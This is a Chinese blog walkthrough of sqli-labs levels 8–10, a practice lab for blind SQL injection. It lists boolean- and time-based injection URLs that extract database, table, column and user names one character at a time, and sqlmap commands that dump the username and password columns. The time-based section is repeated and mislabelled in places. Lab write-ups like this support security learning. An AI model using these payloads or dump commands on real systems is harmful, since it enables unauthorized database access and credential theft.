sqli-labs靶场实现(二)【不显示错误内容的盲注(布尔、时间)】(less-8~10、具体步骤+图文详解)

最新推荐文章于 2023-04-05 17:41:33 发布
最新推荐文章于 2023-04-05 17:41:33 发布
阅读量709 收藏 4
点赞数
分类专栏: sqli-labs靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46709219/article/details/110969764
版权

一)不再显示不再显示错误的盲注
  1)盲注介绍——盲注的流程
  2)get基于时间的盲注(less9(单引号)、less10(双引号))
  3)get基于boolena的盲注(less8(单引号))
  4)sqlmap安全测试

————————————————————————————————————————————————————


一)不再显示不再显示错误的盲注

1)盲注介绍

盲注(blind SQL)是注入攻击的其中一种,它通过向数据库发送true或者false并根据应用程序返回的信息判断结果,这种攻击的程序是因为本身在设置配置时就设计成只显示对错但并不显示解决SQL注入存在的代码问题的方法(也就是不会将SQL语句的错误原因和位置显示出来,只显示对或者错的这个结果)。

盲注分类:时间盲注、布尔型盲注

判断是否存在注入:

id=1(正常显示:you are in)
id=2(正常显示:you are in)
id=1'(错误:不显示任何内容)
id=2'(错误:不显示任何内容)
id=2\(错误:不显示任何内容)【双引号闭合】

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

盲注大致流程:

1.判断是否存在注入,注入是字符型还是数字型(方法同显注的union相同)
2.判断字段数(order by)
3.猜解数据库个数
4.猜解指定数据库名称长度
5.猜解指定数据库名称
6.猜解指定数据库中表的个数
7.猜解指定数据库中表名长度
8.猜解指定数据库中表名
9.猜解指定数据库中指定表的字段数
10.猜解指定数据库中指定表的字段长度
11.猜解指定数据库中指定表的字段名
12.猜解指定数据库中指定表的字段内容个数
13.猜解指定数据库中指定表的字段内容长度
14.猜解指定数据库中指定表的字段内容


2)get基于时间的盲注

先进行基本语句解析:

if(ascii(substr(database(),1,1)=115),1,sleep(5));
        ————当数据库名称的第一个字母的ascii码=115时,执行一次sleep(5)函数等待51if(条件,1,sleep(5))
2ascii(字符1)=115
3substr(string,1,1)
4database()

由外到内层层拆分:
1if(条件,1,sleep(5))————如果条件符合,那么执行一次sleep(5),否则不执行;
1')if(条件,2,sleep(5))————如果条件符合,那么执行两次sleep(5),否则不执行;
2ascii(字符1)=115————将 字符1 转换为ascii码并与115进行比较
3substr(string,1,1)————从string字符串的第一个字符开始截取并且只截取一个字符
4database()————获取当前数据库名称

if() --+  #显示正常
ascii()=105,sleep(5),1
substr((),1)
select schema_name from information_schema.schemata limit 0,1

a)判断是否存在基于时间的盲注

http://192.168.67.143/sqli/Less-10/?id=1" and sleep(5) --+
如果页面需加载5秒就说明存在基于时间的盲注

b)猜解数据库个数

http://192.168.67.143/sqli/Less-10/?id=1" and if((select count(schema_name) from information_schema.schemata)>1,sleep(5),1) --+

c)猜解数据库个数

http://192.168.67.143/sqli/Less-10/?id=1" and if((select count(schema_name) from information_schema.schemata)>1,sleep(5),1) --+   #显示正常

d)猜解指定数据库名称长度

http://192.168.67.143/sqli/Less-10/?id=1" and if(length((select schema_name from information_schema.schemata limit 0,1))=1,sleep(5),1) --+  #显示不正常

e)猜解指定数据库名称

http://192.168.67.143/sqli/Less-10/?id=1" and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1))=105,sleep(5),1) --+  #显示正常

f)猜解指定数据库中表的个数

http://192.168.67.143/sqli/Less-10/?id=1" and if(((select count(table_name) from information_schema.tables where table_schema='security' limit 0,1))=4,sleep(5),1) --+  #显示正常

g)猜解指定数据库中表名长度

http://192.168.67.143/sqli/Less-10/?id=1" and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(5),1) --+  #显示正常

h)猜解指定数据库中表名

http://192.168.67.143/sqli/Less-10/?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))=101,sleep(5),1) --+  #显示正常

i)猜解指定数据库中指定表的字段数

http://192.168.67.143/sqli/Less-10/?id=1" and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1) --+  #显示正常

j)猜解指定数据库中指定表的字段长度

http://192.168.67.143/sqli/Less-10/?id=1" and if(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))=2,sleep(5),1) --+  #显示正常

k)猜解指定数据库中指定表的字段名

http://192.168.67.143/sqli/Less-10/?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1))=105,sleep(5),1) --+  #显示正常

l)猜解指定数据库中指定表的字段内容个数

http://192.168.67.143/sqli/Less-10/?id=1" and if((select count(username) from users)=13,sleep(5),1) --+  #显示正常

m)猜解指定数据库中指定表的字段内容长度

http://192.168.67.143/sqli/Less-10/?id=1" and if(length((select username from users limit 0,1))=4,sleep(5),1) --+  #显示正常

n)猜解指定数据库中指定表的字段内容

http://192.168.67.143/sqli/Less-10/?id=1" and if(ascii(substr((select username from users limit 0,1),1))=68,sleep(5),1) --+  #显示正常

less10:

a)判断是否存在基于时间的盲注

http://192.168.67.143/sqli/Less-10/?id=1" and sleep(5) --+
如果页面需加载5秒就说明存在基于时间的盲注

b)猜解数据库个数

http://192.168.67.143/sqli/Less-10/?id=1" and if((select count(schema_name) from information_schema.schemata)>1,sleep(5),1) --+

c)猜解数据库个数

http://192.168.67.143/sqli/Less-10/?id=1" and if((select count(schema_name) from information_schema.schemata)>1,sleep(5),1) --+   #显示正常

d)猜解指定数据库名称长度

http://192.168.67.143/sqli/Less-10/?id=1" and if(length((select schema_name from information_schema.schemata limit 0,1))=1,sleep(5),1) --+  #显示不正常

e)猜解指定数据库名称

http://192.168.67.143/sqli/Less-10/?id=1" and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1))=105,sleep(5),1) --+  #显示正常

f)猜解指定数据库中表的个数

http://192.168.67.143/sqli/Less-10/?id=1" and if(((select count(table_name) from information_schema.tables where table_schema='security' limit 0,1))=4,sleep(5),1) --+  #显示正常

g)猜解指定数据库中表名长度

http://192.168.67.143/sqli/Less-10/?id=1" and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(5),1) --+  #显示正常

h)猜解指定数据库中表名

http://192.168.67.143/sqli/Less-10/?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))=101,sleep(5),1) --+  #显示正常

i)猜解指定数据库中指定表的字段数

http://192.168.67.143/sqli/Less-10/?id=1" and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1) --+  #显示正常

j)猜解指定数据库中指定表的字段长度

http://192.168.67.143/sqli/Less-10/?id=1" and if(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))=2,sleep(5),1) --+  #显示正常

k)猜解指定数据库中指定表的字段名

http://192.168.67.143/sqli/Less-10/?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1))=105,sleep(5),1) --+  #显示正常

l)猜解指定数据库中指定表的字段内容个数

http://192.168.67.143/sqli/Less-10/?id=1" and if((select count(username) from users)=13,sleep(5),1) --+  #显示正常

m)猜解指定数据库中指定表的字段内容长度

http://192.168.67.143/sqli/Less-10/?id=1" and if(length((select username from users limit 0,1))=4,sleep(5),1) --+  #显示正常

n)猜解指定数据库中指定表的字段内容

http://192.168.67.143/sqli/Less-10/?id=1" and if(ascii(substr((select username from users limit 0,1),1))=68,sleep(5),1) --+  #显示正常


3)get基于boolena的盲注:less8(基于布尔盲注):

a)判断是否存在注入,注入是字符型还是数字型(方法同显注的union相同):

id=1(有显示)
id=1'(无显示)
id=1 and 1=1(有显示)
id=1 and 1=2(有显示,但其实是没反应,也就是没有进入SQL数据库进行判断)
id=1' and 1=1 --+(有显示)
id=1' and 1=2 --+(无显示)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
结论:字符型(因为字符型的会显示不同的提示证明SQL语句被成功执行,而数字型无论SQL对错页面显示的提示都是相同的证明SQL语句并没有被执行)。

b)判断字段数

http://192.168.67.143/sqli/Less-8/?id=1' order by 1 --+ (正常)
http://192.168.67.143/sqli/Less-8/?id=1' order by 2 --+ (正常)
http://192.168.67.143/sqli/Less-8/?id=1' order by 3 --+ (正常)
http://192.168.67.143/sqli/Less-8/?id=1' order by 4 --+ (错误)

在这里插入图片描述
在这里插入图片描述
结论:字段数为3

c)猜解数据库个数:

http://192.168.67.143/sqli/Less-8/?id=1' and (select count(schema_name) from information_schema.schemata)>1 --+   #显示正常
 ...
http://192.168.67.143/sqli/Less-8/?id=1' and (select count(schema_name) from information_schema.schemata)>6 --+   #显示正常
http://192.168.67.143/sqli/Less-8/?id=1' and (select count(schema_name) from information_schema.schemata)>7 --+   #显示错误

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

结论:数据库数量为7

d)猜解数据库名称长度:

从 id=1' and 1=1
   id=1' and 1>1 扩展来的:
   
http://192.168.67.143/sqli/Less-8/?id=1' and length((select schema_name from information_schema.schemata limit 0,1))=1 --+  #显示不正常
...
http://192.168.67.143/sqli/Less-8/?id=1' and length((select schema_name from information_schema.schemata limit 0,1))=18 --+  #显示正常
说明第一个数据库的长度为18

http://192.168.67.143/sqli/Less-8/?id=1' and length((select schema_name from information_schema.schemata limit 1,1))=10 --+  #显示正常
说明第二个数据库长度为10

后续只需修改limit的值和length值即可,不再累赘详解。

在这里插入图片描述

e)猜解数据库名称:

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1))=105 --+  #显示正常
说明第一个数据库的第一个字符为i

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),2))=110 --+  #显示正常
说明第一个数据库的第二个字符为n

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1))=99 --+  #显示正常
说明第二个数据库的第一个字符为c

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),2))=104 --+  #显示正常
说明第二个数据库的第二个字符为h

后续只需修改limit的值和substr值即可,不再累赘详解。

在这里插入图片描述
在这里插入图片描述
f)猜解指定数据库中表的个数:

http://192.168.67.143/sqli/Less-8/?id=1' and ((select count(table_name) from information_schema.tables where table_schema='security' limit 0,1))=4 --+  #显示正常
说明security数据库的表个数为4

在这里插入图片描述

g)猜解指定数据库中表名长度:

http://192.168.67.143/sqli/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6 --+  #显示正常
说明security数据库的第一个表名长度为6

http://192.168.67.143/sqli/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 1,1))=8 --+  #显示正常
说明security数据库的第二个表名长度为8

后续只需修改limit的值和substr值即可,不再累赘详解。

在这里插入图片描述
在这里插入图片描述
h)猜解指定数据库中表名

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))=101 --+  #显示正常
说明security数据库的第一个表的第一个字符为e

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2))=109 --+  #显示正常
说明security数据库的第一个表的第二个字符为m

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1))=114 --+  #显示正常
说明security数据库的第二个表的第一个字符为r

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),2))=101 --+  #显示正常
说明security数据库的第二个表的第二个字符为e

后续只需修改limit的值和substr值即可,不再累赘详解。

i)猜解指定数据库中指定表的字段数:

http://192.168.67.143/sqli/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 --+  #显示正常
说明security数据库的users表字段数为3

在这里插入图片描述

j)猜解指定数据库中指定表的字段长度:

http://192.168.67.143/sqli/Less-8/?id=1' and length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))=2 --+  #显示正常 
说明security数据库的users表的第一个字段长为2

http://192.168.67.143/sqli/Less-8/?id=1' and length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1))=8 --+  #显示正常 
说明security数据库的users表的第二个字段长为8

后续只需修改limit的值和substr值即可,不再累赘详解。

k)猜解指定数据库中指定表的字段名

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1))=105 --+  #显示正常 
说明security数据库的users表的第一个字段的第一个字符为i

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),2))=98 --+  #显示正常 
说明security数据库的users表的第一个字段的第二个字符为d

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1))=117 --+  #显示正常 
说明security数据库的users表的第二个字段的第一个字符为u

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),2))=115 --+  #显示正常 
说明security数据库的users表的第二个字段的第二个字符为s

后续只需修改limit的值和substr值即可,不再累赘详解。

在这里插入图片描述
在这里插入图片描述

l)猜解指定数据库中指定表的字段内容个数

http://192.168.67.143/sqli/Less-8/?id=1' and (select count(username) from users)=13 --+  #显示正常 
说明数据库的users表username字段的数据个数为13

在这里插入图片描述

m)猜解指定数据库中指定表的字段内容长度

http://192.168.67.143/sqli/Less-8/?id=1' and length((select username from users limit 0,1))=4 --+  #显示正常
说明数据库的users表username字段的第一个数据长度为4

http://192.168.67.143/sqli/Less-8/?id=1' and length((select username from users limit 1,1))=8 --+  #显示正常
说明数据库的users表username字段的第二个数据长度为8

后续只需修改limit的值即可,不再累赘详解。

n)猜解指定数据库中指定表的字段内容

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),1))=68 --+  #显示正常
说明数据库的users表username字段的第一个数据的第一个字符为D

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),2))=117 --+  #显示正常
说明数据库的users表username字段的第一个数据的第二个字符为u

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select username from users limit 1,1),1))=65 --+  #显示正常
说明数据库的users表username字段的第二个数据的第一个字符为A

http://192.168.67.143/sqli/Less-8/?id=1' and ascii(substr((select username from users limit 1,1),2))=110 --+  #显示正常
说明数据库的users表username字段的第二个数据的第二个字符为n

后续只需修改limit的值和substr值即可,不再累赘详解。


4)sqlmap安全测试

如果我们可以确定SQL注入类型是布尔盲注,那么我么在使用sqlmap探测时就可以设置探测技术针对布尔盲注:
在这里插入图片描述

注:默认是 BEUSTQ——B是布尔,E是报错,U是联合,S是堆叠,T是时间,Q是查询

布尔盲注:

a)获取所以数据库:

python sqlmap.py -u "192.168.67.143/sqli/Less-8/?id=1" --technique B --dbs --batch

在这里插入图片描述
结果图:
在这里插入图片描述

b)获取指定数据库中所有表:

python sqlmap.py -u "192.168.67.143/sqli/Less-8/?id=1" --technique B -D security --tables --batch

c)获取指定数据库指定表中所有字段:

python sqlmap.py -u "192.168.67.143/sqli/Less-8/?id=1" --technique B -D security -T users --columns --batch

d)dump数据:

python sqlmap.py -u "192.168.67.143/sqli/Less-8/?id=1" --technique B -D security -T users -C username,password --dump --batch

时间盲注:

a)获取所以数据库:

python sqlmap.py -u "192.168.67.143/sqli/Less-8/?id=1" --technique T --dbs --batch

b)获取指定数据库中所有表:

python sqlmap.py -u "192.168.67.143/sqli/Less-8/?id=1" --technique T -D security --tables --batch

c)获取指定数据库指定表中所有字段:

python sqlmap.py -u "192.168.67.143/sqli/Less-8/?id=1" --technique T -D security -T users --columns --batch

d)dump数据:

python sqlmap.py -u "192.168.67.143/sqli/Less-8/?id=1" --technique T -D security -T users -C username,password --dump --batch




A&&K
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
5. **SQL注入原理**:理解SQL注入的形成原因,如不安全的SQL拼接、未过滤用户输入等,并了解不同类型的SQL注入攻击,如基于错误的注入、基于时间盲注等。 6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个...
(手工)【sqli-labs8-10盲注布尔盲注时间盲注
07-06 1195
Sql-盲注】详细过程
sqli-labs-master靶场搭建以及报错解决
Belever的博客
04-05 2004
sqli-labs-master靶场搭建以及报错解决
搭建sql本地靶场出现的问题--无法显示SQL注入报错问题
Alexhirchi的博客
03-15 948
最近想重新打一遍SQL靶场,前几天刚把phpstudy更新到最新版,然后进行本地SQL靶场练习时,发现报错型注入,无报错显示,自闭了一个早上,终于解决了,花了大量时间,希望这篇文章能让你快速解决而不像我被这个小问题搞了半天 问题描述 搭建本地SQL靶场,可以使用一切正常,但到了第五关的,SQL语句文本错误信息没有正常显示 也就是下图红色框的内容并不显示 问题原因 打开源码通过一系列测试发现我...
Sqli-labs安装后点击setup database后显示空白页面的解决办法
KhaoesZ的博客
05-30 1092
图例 解决办法 进入sql-connections目录下编辑setup-db.php Change the mysql_connect to mysqli_connect Change all the query: mysql_query(sql)changedtomysqliquery(sql) changed to mysqli_query(sql)changedtomysqliq​uery(con, $sql) In some cases had to change the (…/sql-conn
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6176
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
sqli-labs靶场
最新发布
05-30
sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入、盲注时间延迟注入等,理解它们的工作原理以及如何避免这些漏洞。靶场通常包含一系列逐步增加难度的挑战,每个挑战都模拟了一个具有特定漏洞的真实...
sqli-labs—————Sql注入之盲注讲解
Fly_鹏程万里
05-08 2156
盲注何为盲注盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注分为三类•基于布尔SQL盲注•基于时间SQL盲注•基于报错的SQL盲注1、基于布尔SQL盲注————构造逻辑判断我们可以利用逻辑判断进行截取字符串相关函数解析  http://blog.csdn.net/Fly_hps/article...
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
关于sqli-labs靶场的第一关不报错的解决方法
jockrom的博客
09-02 1354
id=1后加一个" ' "出现的不报错问题,要在php的配置文件php.ini中修改一下。打开phpstudy。
sqlmap)【sqli-labs8-10盲注布尔盲注时间盲注
07-06 3574
sqlmap-跑盲注靶场
sqli-labs靶场下载安装以及一些常见问题的解决
qq_61877484的博客
02-12 4490
本文章适用于想要学习sql注入的小伙伴们,我只是写来当作一个笔记,小白可以当作一个参考 首先说一下下载和安装的流程 先在电脑上安装phpstudy,而且php需要5.5以及以下的版本 sqli-labs的GitHub获取:GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.https://github.com/Audi-1/sqli-labs 下载完后解压在phpst...
sqli-labs靶场第一关
gou1791241251的博客
12-18 943
传入参数id=1查看页面回显 第一步:判断注入类型 字符型还是数字型 传入单引号或双引号进行测试 页面回显的结果报错信息是’‘1’’ LIMIT 0,1’ 由此可见注入类型是字符型,是用单引号进行闭合的 真正在SQL语句中的是 1’ LIMIT 0,1 其中1’是我们传入的参数进行的测试。 第步:判断数据库有多少个字段 使用order by 进行判断 order by 3 时页面回显正常 注意:这里的–+是为了注释后面的sq
sqli—labs(8到10关)盲注
gclome的博客
11-02 507
Less—8(布尔型单引号盲注) 方法:布尔盲注 在网页中打开 没有任何提示,因为它把错误信息隐藏了,所以并不能用基于错误的注入,只能用盲注盲注需要掌握一些MySQL的相关函数: length(str):返回str字符串的长度。 substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始 mid(st...
sql注入靶场sqli-labs(1-4)
qq_64153534的博客
02-28 281
打开第一关提示输入数字作为参数输入回显用户名与密码信息输入试探可以使用')")这几个常用闭合方式来判断,报错信息回显,根据信息判断注入点就是?id=1'我们输入的1'被两个单引号包裹着,可判断出语句是单引号闭合,注入点就是一个单引号我们使用判断表的字段数,从1开始到4的时候报错,可知字段数为3,后面使用联合注入要知道字段数,这里的作用是将后面的内容都注释掉,使后面的语句不影响我们插入的sql语句
sqli总是显示正确页面不报错解决办法
wcwdnmdnmd的博客
06-25 364
sqli总是显示正确页面不报错解决办法 这两天做实验使用sqli_labs靶场练习sql注入刚装好时总是显示登录成功页面,不报错。后来发现是php版本不对 必须使用5.4版本的php。 更改版本后刷新,成功报错 因为同时运行了dvwa和grade靶场,在使用时需使用5.2版本php ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值